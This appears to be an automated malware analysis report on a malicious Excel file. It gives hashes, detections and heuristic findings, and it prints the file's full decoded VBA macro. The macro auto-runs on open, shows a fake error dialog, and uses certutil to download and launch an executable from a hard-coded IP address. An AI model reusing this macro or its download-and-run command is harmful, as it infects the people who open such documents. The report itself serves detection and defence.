Office (OOXML) malware analysis — malicious · 36ab859d9aa3a971

MALICIOUS

Office (OOXML)

14.4 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-12-25

MD5: 768fe08d9e6ef60bdc1688734adf82cc SHA-1: e79d2d4e7b99e0a5d4b2832afc320eff66c6cdac SHA-256: 36ab859d9aa3a97165be4f14c955f014bf3d809f560605ef7c33ecc72209d5a0

506 Risk Score

Heuristics 13

ClamAV: Win.Downloader.Regsvr32Unregister-6335678-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Downloader.Regsvr32Unregister-6335678-1
VBA project inside OOXML medium 10 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    CreateObject("Wscr" + "ipt.Shell").Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

    CreateObject("Wscr" + "ipt.Shell").Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")

VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Private Sub Document_Open()
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    CreateObject("Wscr" + "ipt.Shell").Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

    Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv")

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

    CreateObject("Wscr" + "ipt.Shell").Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Sub AutoOpen()
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Private Sub Auto_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://185.104.114.115/123.exe In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1684 bytes
SHA-256: `50f2375ff02a857d54e067b70d9c04f21ec08d946700dcc7350f20e41560bbd7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Private Sub Document_Open() Test End Sub Private Sub DocumentOpen() Test End Sub Private Sub Auto_Open() Test End Sub Private Sub AutoOpen() Test End Sub Private Sub Auto_Exec() Test End Sub Sub Test() Dim HsQgOKMOa Title = "Microsoft Application (Compatibility Mode)" Dim msg As String Dim intResponse As Integer msg = "This application appears to be made not supported format. [Error Code: -229]" intResponse = MsgBox(msg, 16, Title) 'Application.Quit Test1 End Sub Private Sub Test1() Dim sheasdll Dim out timenow = Hour(Time()) Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv") If Not oReg.EnumKey(HKEY_LOCAL_MACHINE, "SYSTEM\Example\Key\", "", "") = 0 Then CreateObject("Wscr" + "ipt.Shell").Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe") End If End Sub Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	19968 bytes
SHA-256: `88b664c7f2de898a114573c6f7d953396523f0a484400a4ef62153356d65d5a9`
Detection ClamAV: Win.Downloader.Regsvr32Unregister-6335678-1 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.